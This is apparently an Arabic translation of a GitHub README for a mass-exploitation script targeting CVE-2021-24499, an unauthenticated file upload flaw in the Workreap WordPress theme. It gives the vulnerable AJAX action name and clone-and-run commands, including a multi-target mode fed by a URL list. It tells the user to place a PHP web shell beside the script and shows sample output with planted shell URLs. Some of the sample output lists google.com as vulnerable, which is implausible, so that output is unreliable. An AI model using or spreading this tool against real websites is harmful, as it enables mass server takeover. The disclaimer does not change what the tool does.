
قالب ووردبريس Workreap 2.2.2 - رفع بدون مصادقة يؤدي إلى تنفيذ كود عن بُعد
قالب ووردبريس Workreap 2.2.2 - رفع ملفات غير مصادق عليه يؤدي إلى تنفيذ كود عن بُعد
أداة استغلال قوية ودقيقة للاستغلال الجماعي لثغرة CVE-2021-24499 في قالب Workreap لووردبريس. يتيح هذا الاستغلال رفع ملفات غير مصادق عليه مما قد يؤدي إلى تنفيذ كود عن بُعد (RCE).
CVE-2021-24499 هي ثغرة حرجة في قالب ووردبريس Workreap (الإصدار 2.2.2 وما دون) تسمح للمستخدمين غير المصادق عليهم برفع ملفات تعسفية، بما في ذلك ملفات PHP، عبر إجراء AJAX الخاص بـ workreap_award_temp_file_uploader. يمكن أن يؤدي هذا إلى تنفيذ كود عن بُعد (RCE) على الخادم المستهدف.
الإصدارات المعرضة للخطر: جميع الإصدارات حتى 2.2.2 وما يشملها
درجة CVSS: حرجة
curlopts.php أو shell.php (قشرة ويب PHP)git clone https://github.com/jayhutajulu1/CVE-2021-24499.git
cd CVE-2021-24499
chmod +x exploit.sh
opts.php أو shell.php في نفس الدليل (قشرة الويب PHP الخاصة بك)هدف واحد:
./exploit.sh -u http://target.com
أهداف متعددة (من ملف):
./exploit.sh -l targets.txt
إظهار المساعدة:
./exploit.sh --help
| الخيار | الوصف |
|---|---|
-u URL | استغلال هدف واحد عبر عنوان URL |
-l FILE | استغلال أهداف متعددة من ملف (عنوان URL واحد في كل سطر) |
--help | إظهار قائمة المساعدة |
أنشئ ملفًا نصيًا يحتوي على عنوان URL واحد في كل سطر:
http://target1.com
https://target2.com
http://target3.com
$ ./exploit.sh -u https://domain.com
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com/ >> VULNERABLE!
--> SHELL: https://domain.com//wp-content/uploads/workreap-temp/shell.php
$ ./exploit.sh -l targets.txt
WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution | CVE-2021-24499
Made by Jay Maranatha Hutajulu
https://domain.com >> NOT VULNERABLE!
https://www.google.com >> VULNERABLE!
https://www.domain.com >> NOT VULNERABLE!
https://google.com >> VULNERABLE!
هذه الأداة مقدمة لأغراض تعليمية والاختبار المصرح به فقط.
باستخدامك لهذه الأداة، فإنك توافق على استخدامها فقط لأغراض اختبار الأمان والبحث المشروعة.
المؤلف: Jay Maranatha Hutajulu
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
المساهمات والقضايا وطلبات الميزات مرحب بها! لا تتردد في زيارة صفحة القضايا.
إذا وجدت هذه الأداة مفيدة، يرجى التفكير في منحها نجمة ⭐
تذكير: استخدم دائمًا أدوات الأمان بمسؤولية وأخلاقية. اختبار سعيد! 🚀